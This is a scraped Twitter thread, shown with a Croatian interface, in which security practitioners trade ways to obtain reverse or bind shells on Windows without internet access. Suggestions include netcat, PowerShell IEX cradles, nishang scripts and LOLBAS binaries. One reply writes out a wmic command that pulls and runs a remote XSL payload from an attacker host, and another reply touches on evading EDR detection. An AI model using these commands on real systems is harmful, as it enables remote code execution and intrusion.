I mean uploading a static nc executable and running a cmd bind shell works a charm :)
-
-
-
I agree :) Though for the sake of discussion let's assume I'm looking for something Windows specific (like, assume the machine has no internet access, only LAN, and you have a machine on LAN).
- Još 4 druga odgovora
Novi razgovor -
-
-
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
-
-
this downloader counts?https://twitter.com/cyb3rops/status/1187037377560272897?s=19 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
-
-
I tried writing some Powershell """one liner""" in the past just for fun™, and as it turns out running a revere shell on Windows is pretty awful... shortest I could get was in the order of the hundreds of characters (~500). It's a real pain.
-
whoops *reverse Also, it really depends whether you really want a shell or just want to exfiltrate data, if you want a full cmd prompt or just want to see the results back while sending commands in some not-so-aesthetically-pleasing way or not (which makes it simpler), etc...
- Još 4 druga odgovora
Novi razgovor -
-
-
Afaik, there's no direct equivalent. Many EDR can detect the IEX(<download>) stuff now, so my personal approach is just coding my own variant based on stuff here:https://github.com/samratashok/nishang/tree/master/Shells …
-
Of particular interest to you is probably the Invoke-PowerShellTcpOneLine.ps1 which has a decently small fingerprint.
- Još 2 druga odgovora
Novi razgovor -
-
-
You might be able to cobble something up with these: https://lolbas-project.github.io
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
-
-
Used to be able to do wmic os get /format:http://10.0.0.1/hack.xsl Otherwise powershell iex seems most sensible
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
Has anyone already done this for x64 executables?
That DLL import from a network share looks as if ...